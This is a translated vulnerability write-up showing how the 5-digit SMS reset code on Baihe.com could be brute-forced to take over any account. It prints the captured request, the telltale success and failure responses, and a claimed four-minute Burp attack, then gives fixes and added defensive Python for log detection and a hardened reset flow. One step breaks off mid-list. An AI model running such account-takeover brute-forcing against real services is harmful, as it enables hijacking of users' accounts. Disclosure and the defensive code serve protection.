Resetting the password of any user account on Baihe.com (百合网), and how to fix the vulnerability

Source: Internet
Author: User

Still scanning for girls? Still credential stuffing? Still worrying about how to bypass the image CAPTCHA? Singles' Day is approaching, so here is a password reset vulnerability affecting the accounts of a major website!

1. Start at the Baihe.com main site. Open the Baihe account login page. We do not log in here; instead, click the [Forgot password?] button to enter the password reset flow:

2. Enter the account whose password is to be reset. Because this is only a test of the vulnerability, only my own account is used here:

3. Click "Next" and choose "retrieve via registered mobile phone" as the recovery method. If you have completed identity verification, you can also choose "retrieve via authenticated mobile phone":

4. An SMS code for resetting the password is sent to my mobile phone number (this is the SMS code, not to be confused with the image CAPTCHA).

5. The SMS code received on the phone is [58474]. First I submit an arbitrary 5-digit numeric SMS code, 12345. Clicking Submit returns the error below. Remember to configure the browser proxy at this point:

6. At the same time, the captured request is:

    GET /ForgotPwdByMobileServlet?jsoncallback=jsonp1352425895960&checkflag=1&reqtype=2&code=12345&_=1352426000488&mobilenum=1*********9 HTTP/1.1
    Host: passport.baihe.com
    Proxy-Connection: keep-alive
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1284.2 Safari/537.13
    Accept: text/javascript, application/javascript, */*
    Referer: http://passport.baihe.com/forgotPwdByRegMobile.html
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: zh-CN,zh;q=0.8
    Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
    Cookie: tempID=8171464184; _utma=bytes; _utmb=175516593.1.10.1352424945; _utmc=175516593; _utmz=bytes=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=C22281DF4A91C1DE89890018C79716DA; findpwd_val=1**********9; Hm_lvt_5caa30e0c191a1c525d4a6108bf45a9d=1352424944737; token=1352425904077

In the request above, the parameter code=12345 is the SMS code and the parameter mobilenum=1*********9 is the mobile phone number.

7. After writing so much, let's get started: mark the code parameter as the position to be brute-forced. Because this is a test, I started guessing from 59400.
8. Identify the correct SMS code from the response length or the response content. When the SMS code is wrong, the response is 436 bytes; when it is correct, the response is 634 bytes. Judged by content, a wrong SMS code returns:

    HTTP/1.1 200 OK
    Date: Fri, 09 Nov 2012 01:57:47 GMT
    Server: baihe_passport_60/2.0.63 (Unix) mod_jk/1.2.30
    X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
    Connection: close
    Content-Length: 65
    Cache-Control: max-age=86400
    Expires: Sat, 10 Nov 2012 01:57:47 GMT
    Content-Type: text/json; charset=gbk

    jsonp1352425895961({"mobilenum":"1**********9","checkresult":"0"})

When the SMS code is correct, the response is:

    HTTP/1.1 200 OK
    Date: Fri, 09 Nov 2012 01:57:59 GMT
    Server: baihe_passport_60/2.0.63 (Unix) mod_jk/1.2.30
    X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
    Connection: close
    Content-Length: 262
    Cache-Control: max-age=86400
    Expires: Sat, 10 Nov 2012 01:57:59 GMT
    Content-Type: text/json; charset=gbk

    jsonp1352425895961({"mobilenum":"1**********9","checkresult":"75526369","mobilenum_encode":"eeb0550021599cdd98d3cfc9c0000665d","ed":"Limit"})

9. Use the brute-forced SMS code to reset the account!

10. yundun attack:
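The response-size difference described in step 8 (436 bytes for a wrong code, 634 for a correct one) is also the cleanest signal a defender has for spotting this attack in access logs. The following is an added detection example, not code from the original post or from Baihe: it parses constructed sample log lines (format, phone numbers and timestamps are all assumptions) for the /ForgotPwdByMobileServlet endpoint named above, counts failed code checks per mobile number inside a sliding one-minute window, and raises an alert when a number exceeds a threshold, noting whether a success followed the burst.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlparse

# Constructed sample log (not from the original page), one line per request:
#   <ISO-8601 timestamp> <method> <path?query> <status> <response bytes>
# The page reports a 436-byte response for a wrong code and 634 bytes for a
# correct one; those sizes are reused here as the failure/success signal.
WRONG_CODE_BYTES = 436
RIGHT_CODE_BYTES = 634
CHECK_PATH = "/ForgotPwdByMobileServlet"   # endpoint named on the page


def constructed_log():
    """Build sample lines: 25 wrong guesses for one (made-up) number within a
    minute, then a hit; a second number that enters its code correctly at once."""
    base = datetime(2012, 11, 9, 1, 57, 0)
    fmt = "%Y-%m-%dT%H:%M:%SZ"
    lines = []
    for i in range(25):
        ts = (base + timedelta(seconds=2 * i)).strftime(fmt)
        lines.append(f"{ts} GET {CHECK_PATH}?checkflag=1&reqtype=2&code={59400 + i}"
                     f"&mobilenum=13800000009 200 {WRONG_CODE_BYTES}")
    ts = (base + timedelta(seconds=50)).strftime(fmt)
    lines.append(f"{ts} GET {CHECK_PATH}?checkflag=1&reqtype=2&code=59425"
                 f"&mobilenum=13800000009 200 {RIGHT_CODE_BYTES}")
    lines.append(f"2012-11-09T01:58:10Z GET {CHECK_PATH}?checkflag=1&reqtype=2&code=58474"
                 f"&mobilenum=13900000001 200 {RIGHT_CODE_BYTES}")
    lines.append("2012-11-09T01:58:11Z GET /index.html 200 1024")  # unrelated, ignored
    return lines


LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3}) (\d+)$")


def parse_line(line):
    """Return a dict for SMS-code check requests, or None for anything else."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts, _method, target, _status, nbytes = m.groups()
    url = urlparse(target)
    if url.path != CHECK_PATH:
        return None
    q = parse_qs(url.query)
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "mobile": q.get("mobilenum", [""])[0],
        "code": q.get("code", [""])[0],
        "bytes": int(nbytes),
    }


def detect_code_guessing(lines, window=timedelta(minutes=1), threshold=5):
    """Alert on any mobile number with >= `threshold` failed code checks
    inside a sliding `window`, and report whether a success followed."""
    per_mobile = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev is not None:
            per_mobile[ev["mobile"]].append(ev)

    alerts = []
    for mobile, events in per_mobile.items():
        events.sort(key=lambda e: e["ts"])
        failures = [e for e in events if e["bytes"] == WRONG_CODE_BYTES]
        # Largest number of failures that fit inside one window (two-pointer sweep).
        peak, start = 0, 0
        for end in range(len(failures)):
            while failures[end]["ts"] - failures[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            first_fail = failures[0]["ts"]
            alerts.append({
                "mobile": mobile,
                "failures_in_window": peak,
                "distinct_codes": len({e["code"] for e in failures}),
                "followed_by_success": any(
                    e["bytes"] != WRONG_CODE_BYTES and e["ts"] >= first_fail
                    for e in events),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_code_guessing(constructed_log()):
        print(alert)
```

Keying on response size works only because this endpoint leaks the outcome that way; where the application logs the checkresult field itself, match on that instead, since the size will shift with any change to headers or body.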

Solution:

1. There is another very serious bug: once the account has been retrieved, the reset link stays usable long-term. My reset link is as follows (how was it obtained?); because the risk of my account being maliciously reset and my personal information leaked has been assessed, the last eight digits are hidden: http://passport.baihe.com/resetPwd.jsp? As long as this link is used, the password can be changed again without going through the reset process.

2. Brute-forcing a 5-digit numeric SMS code takes on average 50,000 requests. Using Burp Suite with 100 threads on a single machine, I reset the account of any mobile phone number in four minutes! Dangerous.

3. The SMS code is 5 pure digits, or even 4. No image CAPTCHA is required, and the SMS code does not even have a validity period. Why not lock the password reset request after five consecutive failed attempts?
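The three fixes the solution asks for (a code that expires, a lockout after five consecutive failures, and a reset link that is single-use and short-lived) fit together in one verification path. The following is an added example written for this page, not Baihe's code: a hypothetical in-memory PasswordResetService whose policy values (6 digits, 10-minute code lifetime, lockout after 5 attempts for 30 minutes, 15-minute reset token) are assumptions chosen for illustration. The FakeClock and demo() helpers exist only so the flow can be exercised offline.

```python
import hmac
import secrets
from dataclasses import dataclass
from datetime import datetime, timedelta

# Policy values are assumptions for this example, not Baihe's settings.
CODE_DIGITS = 6                     # 6 digits instead of the 4-5 the page describes
CODE_TTL = timedelta(minutes=10)    # the page notes the code never expired
MAX_ATTEMPTS = 5                    # lock after five consecutive failures
LOCKOUT = timedelta(minutes=30)
TOKEN_TTL = timedelta(minutes=15)   # the page's reset link stayed valid indefinitely


@dataclass
class _Challenge:
    code: str
    expires: datetime
    attempts: int = 0


class PasswordResetService:
    """Hypothetical in-memory model of a hardened SMS password-reset flow."""

    def __init__(self, now=datetime.utcnow):
        self._now = now            # injectable clock so the demo can move time
        self._challenges = {}      # mobile -> _Challenge
        self._locked = {}          # mobile -> lockout expiry
        self._tokens = {}          # reset token -> (mobile, expiry)

    def _is_locked(self, mobile, now):
        return now < self._locked.get(mobile, now)

    def send_code(self, mobile):
        """Issue a fresh random code, or None while the number is locked out.
        The code goes to the SMS gateway only, never into the HTTP reply."""
        now = self._now()
        if self._is_locked(mobile, now):
            return None
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        self._challenges[mobile] = _Challenge(code=code, expires=now + CODE_TTL)
        return code

    def verify_code(self, mobile, submitted):
        """Check a submitted code. Every outcome is a dict with an 'ok' flag, so
        wrong/expired/locked are not distinguishable by response length."""
        now = self._now()
        if self._is_locked(mobile, now):
            return {"ok": False, "reason": "locked"}
        ch = self._challenges.get(mobile)
        if ch is None:
            return {"ok": False, "reason": "no_challenge"}
        if now > ch.expires:
            del self._challenges[mobile]
            return {"ok": False, "reason": "expired"}
        if not hmac.compare_digest(ch.code.encode(), submitted.encode()):
            ch.attempts += 1
            if ch.attempts >= MAX_ATTEMPTS:
                del self._challenges[mobile]     # burn the code; a new one is needed later
                self._locked[mobile] = now + LOCKOUT
                return {"ok": False, "reason": "locked"}
            return {"ok": False, "reason": "wrong_code",
                    "attempts_left": MAX_ATTEMPTS - ch.attempts}
        del self._challenges[mobile]             # a correct code is single-use
        token = secrets.token_urlsafe(32)
        self._tokens[token] = (mobile, now + TOKEN_TTL)
        return {"ok": True, "reset_token": token}

    def reset_password(self, token, new_password):
        """Consume the token (single use); accept the new password only if still valid."""
        entry = self._tokens.pop(token, None)
        if entry is None:
            return False
        mobile, expires = entry
        if self._now() > expires:
            return False
        # A real service would store a salted password hash for `mobile` here.
        return True


class FakeClock:
    """Demo clock: calling it returns the current fake time; add to .t to advance."""
    def __init__(self, start):
        self.t = start

    def __call__(self):
        return self.t


def demo():
    """Walk the flow with a constructed number and return the observed outcomes."""
    clock = FakeClock(datetime(2012, 11, 9, 1, 57, 0))
    svc = PasswordResetService(now=clock)
    mobile = "13800000009"                                   # constructed number
    code = svc.send_code(mobile)
    wrong = f"{(int(code) + 1) % 10 ** CODE_DIGITS:0{CODE_DIGITS}d}"
    out = {"guesses": [svc.verify_code(mobile, wrong)["reason"] for _ in range(MAX_ATTEMPTS)]}
    out["right_code_while_locked"] = svc.verify_code(mobile, code)["reason"]
    out["resend_while_locked"] = svc.send_code(mobile)
    clock.t += LOCKOUT + timedelta(seconds=1)
    ok = svc.verify_code(mobile, svc.send_code(mobile))
    out["accepted"] = ok["ok"]
    out["first_reset"] = svc.reset_password(ok["reset_token"], "new-password")
    out["replayed_reset"] = svc.reset_password(ok["reset_token"], "another")
    code = svc.send_code(mobile)
    clock.t += CODE_TTL + timedelta(seconds=1)
    out["stale_code"] = svc.verify_code(mobile, code)["reason"]
    return out


if __name__ == "__main__":
    print(demo())
```

With five attempts per challenge and six digits, a guesser's chance per issued code is 5 in a million instead of a near-certain hit after 50,000 requests; the lockout also blocks send_code, so the attacker cannot simply request a fresh code to reset the attempt counter, and a reset token that is popped on first use cannot be replayed the way the long-lived resetPwd.jsp link could.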
